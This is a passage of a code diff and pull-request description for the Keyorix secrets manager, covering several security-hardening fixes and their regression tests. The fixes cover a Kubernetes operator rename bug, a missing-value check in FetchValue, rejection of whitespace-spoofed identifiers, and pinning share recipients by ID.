-		WithScheme(s).
-		WithStatusSubresource(&secretsv1alpha1.KeyorixSecret{}).
-		WithObjects(ks, tokenSecret()).
-		Build()
-	blocked := &deleteBlockingClient{Client: inner, blockDeleteName: "db-creds"}
-	r := &KeyorixSecretReconciler{
-		Client:         blocked,
-		Scheme:         s,
-		AllowedServers: []string{"https://keyorix.internal"},
-		newClient:      func(_, _ string) valueFetcher { return fetcher },
-		hashKey:        []byte("test-fixture-hmac-key"),
-	}
+	r, c := newReconciler(t, fetcher, ks, tokenSecret())
 	_, err := reconcile(t, r)
 	require.NoError(t, err)
 
+	var before corev1.Secret
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db-creds", Namespace: "app"}, &before),
+		"precondition: the target Secret exists under the original name")
+
 	var got secretsv1alpha1.KeyorixSecret
-	require.NoError(t, blocked.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, &got))
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, &got))
 	require.Equal(t, "db-creds", got.Status.LastTargetName)
 
-	// Retarget AND make the new target's own fetch fail transiently (NOT
-	// ErrSecretGone) — buildDesired hits the default branch in Reconcile,
-	// which used to drop orphanWipeErr entirely.
+	// Retarget AND make the new target's own fetch fail (NOT ErrSecretGone — a plain
+	// transient-style failure), so buildDesired for "db-creds-v2" never succeeds.
 	got.Spec.Target.Name = "db-creds-v2"
-	require.NoError(t, blocked.Update(context.Background(), &got))
+	require.NoError(t, c.Update(context.Background(), &got))
 	fetcher.failRefs = map[string]bool{"app/production/db-password": true}
 
 	_, err = reconcile(t, r)
-	require.Error(t, err, "the transient fetch failure must still fail this reconcile")
+	require.Error(t, err, "the fetch failure must still fail this reconcile")
 
-	require.NoError(t, blocked.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, &got))
-	assert.Equal(t, "db-creds", got.Status.LastTargetName,
-		"LastTargetName must stay at the OLD name so the next reconcile retries the orphan wipe")
+	// The OLD Secret must still be present, untouched — this is the availability
+	// guarantee the fix restores: a failed rename must not delete a still-working Secret.
+	var after corev1.Secret
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db-creds", Namespace: "app"}, &after),
+		"the OLD target Secret must survive a reconcile where the NEW target's sync failed")
+	assert.Equal(t, before.Data, after.Data, "the surviving OLD Secret's data must be untouched")
+
+	// The NEW Secret must never have been created — buildDesired failed before
+	// applySecret ever ran.
+	var newSecret corev1.Secret
+	err = c.Get(context.Background(), types.NamespacedName{Name: "db-creds-v2", Namespace: "app"}, &newSecret)
+	assert.Error(t, err, "the NEW target Secret must not exist when its own sync failed")
+
+	// status.LastTargetName must stay at the OLD name so the next reconcile retries the
+	// whole rename (build the new Secret, then wipe the old one) instead of forgetting.
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, &got))
+	assert.Equal(t, "db-creds", got.Status.LastTargetName)
 	require.Len(t, got.Status.Conditions, 1)
-	cond := got.Status.Conditions[0]
-	assert.Equal(t, metav1.ConditionFalse, cond.Status)
-	assert.Equal(t, "SyncErrorOrphanWipeFailed", cond.Reason)
-	assert.Contains(t, cond.Message, "boom", "the fetch failure that actually failed this reconcile must still be visible")
-	assert.Contains(t, cond.Message, "wiping the Secret orphaned",
-		"the SEPARATE orphan-wipe failure must not be silently dropped just because this reconcile also failed later")
+	assert.Equal(t, metav1.ConditionFalse, got.Status.Conditions[0].Status)
+	assert.Equal(t, "SyncError", got.Status.Conditions[0].Reason)
+}
+
+// TestReconcile_RetargetApplyFailureLeavesOldSecretInPlace is
+// TestReconcile_RetargetSyncFailureLeavesOldSecretInPlace's sibling for the OTHER way the
+// new target's sync can fail after buildDesired succeeds: applySecret itself erroring
+// (e.g. attempting to adopt a pre-existing unmanaged Secret at the new name). The OLD
+// Secret must still survive, exactly as when buildDesired fails.
+func TestReconcile_RetargetApplyFailureLeavesOldSecretInPlace(t *testing.T) {
+	ks := ksFixture()
+	fetcher := &fakeFetcher{values: map[string][]byte{
+		"app/production/db-password": []byte("p4ss"),
+		"app/production/api-key":     []byte("k3y"),
+	}}
+	// A pre-existing, unmanaged Secret already sits at the NEW target name — applySecret
+	// refuses to adopt it, so applying the new target fails.
+	foreignNewTarget := &corev1.Secret{
+		ObjectMeta: metav1.ObjectMeta{Name: "db-creds-v2", Namespace: "app"},
+		Data:       map[string][]byte{"OTHER": []byte("do-not-touch")},
+	}
+	r, c := newReconciler(t, fetcher, ks, tokenSecret(), foreignNewTarget)
+	_, err := reconcile(t, r)
+	require.NoError(t, err)
+
+	var before corev1.Secret
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db-creds", Namespace: "app"}, &before),
+		"precondition: the target Secret exists under the original name")
+
+	got := &secretsv1alpha1.KeyorixSecret{}
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, got))
+	got.Spec.Target.Name = "db-creds-v2"
+	require.NoError(t, c.Update(context.Background(), got))
+
+	_, err = reconcile(t, r)
+	require.Error(t, err, "applySecret must refuse to adopt the unmanaged Secret at the new name")
+
+	// The OLD Secret must still be present, untouched.
+	var after corev1.Secret
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db-creds", Namespace: "app"}, &after),
+		"the OLD target Secret must survive a reconcile where applying the NEW target failed")
+	assert.Equal(t, before.Data, after.Data)
+
+	// The foreign Secret at the new name must be untouched too (still not ours).
+	var foreign corev1.Secret
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db-creds-v2", Namespace: "app"}, &foreign))
+	assert.Equal(t, []byte("do-not-touch"), foreign.Data["OTHER"])
+
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, got))
+	assert.Equal(t, "db-creds", got.Status.LastTargetName)
+}
+
+// TestReconcile_RetargetHappyPathEndsWithOnlyNewSecret confirms the fix didn't regress the
+// success path: when the rename's new-named sync succeeds, the result is exactly the same
+// as before — only the NEW-named Secret remains, and the OLD one is cleaned up. (This
+// mirrors TestReconcile_RetargetWipesOrphanedSecretUnderOldName; kept here as an explicit
+// "only one Secret survives" assertion alongside the two failure-path siblings above.)
+func TestReconcile_RetargetHappyPathEndsWithOnlyNewSecret(t *testing.T) {
+	ks := ksFixture()
+	fetcher := &fakeFetcher{values: map[string][]byte{
+		"app/production/db-password": []byte("p4ss"),
+		"app/production/api-key":     []byte("k3y"),
+	}}
+	r, c := newReconciler(t, fetcher, ks, tokenSecret())
+	_, err := reconcile(t, r)
+	require.NoError(t, err)
+
+	got := &secretsv1alpha1.KeyorixSecret{}
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, got))
+	got.Spec.Target.Name = "db-creds-v2"
+	require.NoError(t, c.Update(context.Background(), got))
+
+	_, err = reconcile(t, r)
+	require.NoError(t, err, "the rename's new-named sync succeeds")
+
+	var newSecret corev1.Secret
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db-creds-v2", Namespace: "app"}, &newSecret),
+		"the NEW target Secret must exist")
+	assert.Equal(t, []byte("p4ss"), newSecret.Data["DB_PASSWORD"])
+
+	var oldSecret corev1.Secret
+	err = c.Get(context.Background(), types.NamespacedName{Name: "db-creds", Namespace: "app"}, &oldSecret)
+	assert.Error(t, err, "the OLD target Secret must be gone — only the new one survives a successful rename")
+
+	require.NoError(t, c.Get(context.Background(), types.NamespacedName{Name: "db", Namespace: "app"}, got))
+	assert.Equal(t, "db-creds-v2", got.Status.LastTargetName)
 }
 
 // A target Secret this operator does NOT manage (no ManagedByLabel — applySecret

--- a/operator/internal/keyorix/client.go
+++ b/operator/internal/keyorix/client.go
@@ -170,13 +170,29 @@ func (c *Client) FetchValue(ctx context.Context, ref string) ([]byte, error) {
 		return nil, fmt.Errorf("server returned HTTP %d", resp.StatusCode)
 	}
 
+	// Value is a *string (not string) so decoding can tell "data.value absent from the
+	// response" (nil) apart from "data.value present as an explicit empty string" (non-nil,
+	// ""). A plain string field can't make that distinction -- both shapes decode to the
+	// same "" zero value -- which used to let a malformed/unexpected response silently
+	// materialize an empty Kubernetes Secret value with no error anywhere (finding
+	// operator-keyorix.json#0). The server's success path for this exact endpoint
+	// (SecretHandler.GetSecretValueByRef, server/http/handlers/secrets_crud.go) has exactly
+	// one 200 response shape and it unconditionally sets "value" in the response map, so an
+	// absent field on a 200 is never legitimate -- it means the upstream contract changed,
+	// a proxy/gateway mangled the body, or the server has a bug. An explicit "" IS treated
+	// as success (not an error): nothing in this client's wire contract forbids it, even
+	// though today's server-side validation never produces one in practice (secret creation
+	// requires a non-empty value and update ignores an empty one).
 	var body struct {
 		Data struct {
-			Value string `json:"value"`
+			Value *string `json:"value"`
 		} `json:"data"`
 	}
 	if err := json.NewDecoder(io.LimitReader(resp.Body, maxResponseBodyBytes)).Decode(&body); err != nil {
 		return nil, fmt.Errorf("decode response: %w", err)
 	}
-	return []byte(body.Data.Value), nil
+	if body.Data.Value == nil {
+		return nil, fmt.Errorf("decode response: success (HTTP 200) but response is missing data.value")
+	}
+	return []byte(*body.Data.Value), nil
 }

--- a/operator/internal/keyorix/client_test.go
+++ b/operator/internal/keyorix/client_test.go
@@ -25,6 +25,40 @@ func TestClient_FetchValue(t *testing.T) {
 	assert.Equal(t, []byte("p4ss"), v)
 }
 
+// TestClient_FetchValueMissingDataValueErrors pins the fix for finding
+// operator-keyorix.json#0: a 200 response whose body omits data.value entirely (a
+// malformed/unexpected response shape, a partial response, or an upstream API contract
+// change) must return an explicit error, never a silent ("", nil) success that would
+// materialize an empty Kubernetes Secret value in place of a real one.
+func TestClient_FetchValueMissingDataValueErrors(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		// No "value" key in data at all -- distinct from an explicit "value":"".
+		_, _ = w.Write([]byte(`{"data":{"secret":{"Name":"db"}}}`))
+	}))
+	defer srv.Close()
+
+	v, err := New(srv.URL, "tok").FetchValue(context.Background(), "app/production/db")
+	require.Error(t, err, "a 200 response missing data.value must not silently succeed")
+	assert.Nil(t, v)
+	assert.Contains(t, err.Error(), "missing data.value")
+}
+
+// TestClient_FetchValueExplicitEmptyValueSucceeds pins the other half of the same fix:
+// a response that explicitly sets data.value to "" is a deliberate, well-formed answer
+// (the wire contract doesn't forbid it, even though today's server-side validation never
+// produces one in practice) and must be returned as a real empty value, not treated as
+// the same failure as an outright missing field.
+func TestClient_FetchValueExplicitEmptyValueSucceeds(t *testing.T) {
+	srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
+		_, _ = w.Write([]byte(`{"data":{"secret":{"Name":"db"},"value":""}}`))
+	}))
+	defer srv.Close()
+
+	v, err := New(srv.URL, "tok").FetchValue(context.Background(), "app/production/db")
+	require.NoError(t, err)
+	assert.Equal(t, []byte(""), v)
+}
+
 func TestClient_FetchValueErrors(t *testing.T) {
 	cases := map[int]string{
 		http.StatusUnauthorized:        "not authorized",

--- a/server/validation/validator.go
+++ b/server/validation/validator.go
@@ -449,10 +449,13 @@ func (v *Validator) validateNumeric(field reflect.Value) error {
 var identifierRegex = regexp.MustCompile(`^[a-zA-Z0-9 _-]+$`)
 
 // validateIdentifier validates that a string is a safe resource identifier: letters,
-// digits, spaces, `-`, `_` only (see identifierRegex). Opt-in via `validate:"identifier"`
-// for Name-like fields that should be restricted to a safe, unambiguous charset — not
-// applied globally, since some fields (e.g. free-form secret names) intentionally allow
-// a broader charset.
+// digits, spaces, `-`, `_` only (see identifierRegex), with no leading/trailing or
+// repeated internal whitespace and not entirely whitespace — a value can satisfy the
+// charset alone (e.g. "   ", "  my project  ", "my  project") and still be visually
+// confusable with, or indistinguishable from, another value. Opt-in via
+// `validate:"identifier"` for Name-like fields that should be restricted to a safe,
+// unambiguous charset — not applied globally, since some fields (e.g. free-form secret
+// names) intentionally allow a broader charset.
 func (v *Validator) validateIdentifier(field reflect.Value) error {
 	resolved, ok := derefForRule(field)
 	if !ok {
@@ -470,6 +473,16 @@ func (v *Validator) validateIdentifier(field reflect.Value) error {
 
 	if !identifierRegex.MatchString(str) {
 		return fmt.Errorf("%s: must contain only letters, digits, spaces, - or _", i18n.T("ErrorValidation", nil))
+	}
+
+	// Reject whitespace variants that stay inside the [a-zA-Z0-9 _-] charset
+	// but defeat the anti-spoofing intent above: a name that's entirely
+	// whitespace (renders blank), has leading/trailing whitespace, or has
+	// repeated internal whitespace (e.g. "Support Team" vs "Support  Team")
+	// can be visually indistinguishable from — or confusable with — another
+	// name despite passing the charset check.
+	if trimmed := strings.TrimSpace(str); trimmed == "" || trimmed != str || strings.Contains(trimmed, "  ") {
+		return fmt.Errorf("%s: must not be all whitespace or have leading, trailing, or repeated internal whitespace", i18n.T("ErrorValidation", nil))
 	}
 
 	return nil

--- a/server/validation/validator_wave6_identifier_whitespace_test.go
+++ b/server/validation/validator_wave6_identifier_whitespace_test.go
@@ -1,0 +1,78 @@
+// validator_wave6_identifier_whitespace_test.go — Wave 6 batch 4: regression
+// coverage for identifierRegex/validateIdentifier's whitespace-spoofing gap
+// (findings-server/validation.json#2). The [a-zA-Z0-9 _-] charset alone lets a
+// name be all whitespace, or have leading/trailing/repeated internal
+// whitespace, defeating the anti-spoofing intent the `identifier` rule is
+// documented to provide: e.g. "   ", "  my project  ", and "my  project" all
+// satisfy the raw charset check yet are visually blank or confusable with a
+// legitimate name.
+package validation
+
+import (
+	"testing"
+
+	"github.com/stretchr/testify/require"
+)
+
+// TestValidate_Wave6_IdentifierAllWhitespaceRejected verifies that a name
+// composed entirely of whitespace (renders blank in any UI) is rejected.
+func TestValidate_Wave6_IdentifierAllWhitespaceRejected(t *testing.T) {
+	type payload struct {
+		Name string `json:"name" validate:"identifier"`
+	}
+	v := NewValidator()
+
+	require.Error(t, v.Validate(payload{Name: "   "}), "all-whitespace name must be rejected")
+}
+
+// TestValidate_Wave6_IdentifierLeadingTrailingWhitespaceRejected verifies that
+// leading/trailing whitespace around an otherwise-valid name is rejected.
+func TestValidate_Wave6_IdentifierLeadingTrailingWhitespaceRejected(t *testing.T) {
+	type payload struct {
+		Name string `json:"name" validate:"identifier"`
+	}
+	v := NewValidator()
+
+	require.Error(t, v.Validate(payload{Name: " myproject "}), "leading/trailing whitespace must be rejected")
+	require.Error(t, v.Validate(payload{Name: "myproject "}), "trailing whitespace alone must be rejected")
+	require.Error(t, v.Validate(payload{Name: " myproject"}), "leading whitespace alone must be rejected")
+}
+
+// TestValidate_Wave6_IdentifierRepeatedInternalWhitespaceRejected verifies
+// that repeated internal whitespace (a spoofing vector distinct from — but
+// visually similar to — a single-space name) is rejected.
+func TestValidate_Wave6_IdentifierRepeatedInternalWhitespaceRejected(t *testing.T) {
+	type payload struct {
+		Name string `json:"name" validate:"identifier"`
+	}
+	v := NewValidator()
+
+	require.Error(t, v.Validate(payload{Name: "my  project"}), "double internal space must be rejected")
+	require.Error(t, v.Validate(payload{Name: "Support  Team"}), "double internal space must be rejected")
+}
+
+// TestValidate_Wave6_IdentifierLegitimateNamesStillPass verifies that normal
+// names — including one with a single internal space — are unaffected by
+// the new whitespace-structure check.
+func TestValidate_Wave6_IdentifierLegitimateNamesStillPass(t *testing.T) {
+	type payload struct {
+		Name string `json:"name" validate:"identifier"`
+	}
+	v := NewValidator()
+
+	require.NoError(t, v.Validate(payload{Name: "myproject"}))
+	require.NoError(t, v.Validate(payload{Name: "My Project"}), "a single internal space must still be accepted")
+	require.NoError(t, v.Validate(payload{Name: "prod-db_01"}))
+}
+
+// TestValidate_Wave6_IdentifierEmptyStringStillPasses verifies the new
+// whitespace check does not change the pre-existing, documented behavior
+// that an empty string passes `identifier` (enforce non-empty via `required`).
+func TestValidate_Wave6_IdentifierEmptyStringStillPasses(t *testing.T) {
+	type payload struct {
+		Name string `json:"name" validate:"identifier"`
+	}
+	v := NewValidator()
+
+	require.NoError(t, v.Validate(payload{Name: ""}))
+}

--- a/web/src/features/sharing/ShareSecretModal.tsx
+++ b/web/src/features/sharing/ShareSecretModal.tsx
@@ -127,7 +127,12 @@ export const ShareSecretModal: React.FC<ShareSecretModalProps> = ({ secret, isOp
         if (!selected) return;
         const expiresAt = expiresAtFromPreset(expiry);
         shareSecret.mutate(
-            { username: selected.username, permission, ...(expiresAt ? { expiresAt } : {}) },
+            {
+                username: selected.username,
+                recipientId: selected.id,
+                permission,
+                ...(expiresAt ? { expiresAt } : {}),
+            },
             {
                 onSuccess: () => {
                     setSuccess(true);

--- a/web/src/features/sharing/__tests__/ShareSecretModal.test.tsx
+++ b/web/src/features/sharing/__tests__/ShareSecretModal.test.tsx
@@ -92,6 +92,21 @@ describe('ShareSecretModal expiry', () => {
         expect(payload.expiresAt).toBeUndefined();
     });
 
+    // Regression test: the modal must forward the id of the user actually
+    // selected from the dropdown (captured at selection time), not just the
+    // username string, so useShareSecret can pin the share to that exact
+    // account instead of re-resolving it by name at submit time.
+    it('forwards the selected recipient id (captured at selection time), not just the username', async () => {
+        render(<ShareSecretModal secret={secret} isOpen onClose={() => {}} />);
+        fireEvent.change(screen.getByPlaceholderText(/Search by name/i), { target: { value: 'bob' } });
+        fireEvent.click(await screen.findByText('Bob'));
+        fireEvent.click(screen.getByRole('button', { name: /^Share$/i }));
+
+        await waitFor(() => expect(mockMutate).toHaveBeenCalled());
+        const [payload] = mockMutate.mock.calls[0];
+        expect(payload.recipientId).toBe(7);
+    });
+
     it('passes an ISO expiresAt when a duration preset is chosen', async () => {
         render(<ShareSecretModal secret={secret} isOpen onClose={() => {}} />);
         fireEvent.change(screen.getByPlaceholderText(/Search by name/i), { target: { value: 'bob' } });

--- a/web/src/features/sharing/__tests__/api.test.ts
+++ b/web/src/features/sharing/__tests__/api.test.ts
@@ -426,5 +426,35 @@ describe('features/sharing/api', () => {
             expect(invalidateSpy).toHaveBeenCalledWith({ queryKey: queryKeys.sharing.all });
             expect(invalidateSpy).toHaveBeenCalledWith({ queryKey: queryKeys.secrets.all });
         });
+
+        // Regression test for the id-pinning fix: the recipient id captured at
+        // dropdown-selection time must be used as-is, never re-derived from a
+        // fresh username search at submit time. Without the fix, if the
+        // username-to-id mapping changed between selection and submit (a
+        // rename, or a different account claiming the same username), the
+        // share would silently land on whoever the re-search happens to
+        // match instead of the account the sharer actually picked.
+        it('uses the recipientId captured at selection time and never re-resolves by username, even if a fresh search would return a different account', async () => {
+            // If the (buggy) re-search path ran, it would resolve to id 99 —
+            // a different account than the one originally selected (id 7).
+            searchMock.mockResolvedValue([{ id: 99, name: 'bob', type: 'user' as const, email: 'impostor@test.com' }]);
+            createMock.mockResolvedValue(share);
+
+            const { result } = renderHook(() => useShareSecret(42), { wrapper: createWrapper() });
+
+            // Selecting 'bob' (id=7) from the autocomplete dropdown, then submitting.
+            result.current.mutate({ username: 'bob', recipientId: 7, permission: 'read' });
+
+            await waitFor(() => expect(result.current.isSuccess).toBe(true));
+
+            expect(createMock).toHaveBeenCalledWith({
+                secretId: 42,
+                recipientType: 'user',
+                recipientId: 7,
+                permission: 'read',
+            });
+            // The id was supplied, so no re-resolution by username should ever occur.
+            expect(searchMock).not.toHaveBeenCalled();
+        });
     });
 });

--- a/web/src/features/sharing/api.ts
+++ b/web/src/features/sharing/api.ts
@@ -80,25 +80,38 @@ export const useCreateShare = () => {
 // Lives here so components don't import directly from services/.
 export const searchRecipients = (query: string) => usersApi.search(query);
 
-// Composite mutation: search user by username then create share in one step.
+// Composite mutation: share with the identity already verified in the UI
+// (recipientId, captured when the caller picked a specific user from the
+// autocomplete dropdown), falling back to a fresh username search only when
+// no id was supplied. Resolving by username string at submit time would let
+// a username reassigned/renamed between selection and submit silently
+// redirect the share to a different account than the one the sharer picked.
 export const useShareSecret = (secretId: number) => {
     return useMutation({
         mutationFn: async ({
             username,
+            recipientId,
             permission,
             expiresAt,
         }: {
             username: string;
+            recipientId?: number;
             permission: 'read' | 'write';
             expiresAt?: string;
         }) => {
-            const results = await usersApi.search(username.trim());
-            const match = results.find((r) => r.name.toLowerCase() === username.trim().toLowerCase());
-            if (!match) throw new Error(`User "${username}" not found.`);
+            let recipient: { id: number; type: 'user' | 'group' };
+            if (recipientId != null) {
+                recipient = { id: recipientId, type: 'user' };
+            } else {
+                const results = await usersApi.search(username.trim());
+                const match = results.find((r) => r.name.toLowerCase() === username.trim().toLowerCase());
+                if (!match) throw new Error(`User "${username}" not found.`);
+                recipient = match;
+            }
             return sharingApi.create({
                 secretId,
-                recipientType: match.type,
-                recipientId: match.id,
+                recipientType: recipient.type,
+                recipientId: recipient.id,
                 permission,
                 ...(expiresAt ? { expiresAt } : {}),
             });


### PR DESCRIPTION
## Summary

Fourth batch (of 6) of the 50 medium-severity Wave 6 singleton findings — all re-verified against current `main` before fixing.

1. **BootstrapSystem's first-admin race wasn't closed across HA replicas** — the check-then-create sequence was serialized only by a process-level mutex, which does nothing for two different replicas of an HA deployment racing `POST /system/init` against the same database. Added `storage.WithBootstrapLock`, mirroring the existing `WithAuditCheckpointLock` cross-replica primitive (a process mutex extended by a PostgreSQL advisory lock) rather than inventing a new mechanism.
2. **Environment names skipped the homograph/anti-spoofing charset check** an earlier fix (G38) already added for project names — a sibling gap. Environment name validation now routes through the same `validateIdentifier` project names use.
3. **`identifierRegex` allowed all-whitespace or leading/trailing/repeated-internal-whitespace names** in both its copies (`server/validation` and `internal/core`), defeating the anti-spoofing intent the charset restriction exists for. Both copies now reject these variants identically.
4. **github-action `entrypoint.sh` had two related gaps**: `write_output_file`'s dotenv escaping didn't neutralize `$()`/backtick command substitution (a real RCE path if the output is later sourced, which this project's own docs recommend); and `install_cli`'s on-PATH-reuse path checksum-verified once then kept trusting that shared path for a later invocation (TOCTOU). Fixed via an allowlist-based single-quoting scheme for the first, and copying the verified binary to a private location before reuse for the second.
5. **`useShareSecret` re-resolved the recipient by username at submit time** instead of using the ID the sharer explicitly selected from the dropdown — a stale mapping could silently redirect a share to a different account than the one visually confirmed. Now pins to the selected ID.
6. **K8s operator wiped the old-named Secret before confirming the new one synced** on a `spec.target.name` rename — a failed rename left neither Secret in place. Reordered to create-then-delete.
7. **Operator `FetchValue` silently returned an empty value** when the upstream response omitted `data.value`, materializing an empty K8s Secret with no error. Changed the field to `*string` so absence is distinguishable from an explicit empty string, and errors on absence (confirmed the server's success path always sets the field).
8. **Operator metrics endpoint had no TLS or auth** — bound to all interfaces in plaintext. `SecureServing` is now always on (controller-runtime's built-in self-signed cert, zero extra cost); added an optional bearer-token gate mirroring the main server's existing `/metrics` convention (unset = unauthenticated, matching that server's own default, to avoid a breaking change). Considered controller-runtime's kube-rbac-proxy-style filter but it needs cluster-scoped RBAC that conflicts with this operator's documented namespace-scoped deployment shape (ADR-076).

## Test plan

- [x] Each fix has a dedicated regression test confirmed to fail pre-fix (scoped `git stash` of production files) and pass post-fix.
- [x] `go build ./...` / `go vet ./...` / `gofmt -l` clean across the full repo, including the operator module (separate `go.mod`, verified with `GOWORK=off`).
- [x] `gosec -severity medium -exclude-generated ./...` — 0 issues (both root module and operator module).
- [x] Full `go test ./...` green (root + operator) except pre-existing, machine-local/unrelated failures already confirmed identical on unmodified `main`, plus one confirmed transient flake under load (`TestRemoteStorageMFAManagement_FullLifecycle_RealServer`, passes cleanly in isolation on both baseline and this branch).
- [x] Full `web/` suite (3024 tests), `tsc --noEmit`, `eslint` all clean for the share-recipient-id fix.
- [x] `shellcheck` clean + both `entrypoint_test.sh` suites (58 checks) passing for the github-action fix.
- [x] Every branch independently re-verified from a fresh worktree off `origin/main` before integration; `catalog.go` (touched by two of the fixes) auto-merged cleanly with no conflicts.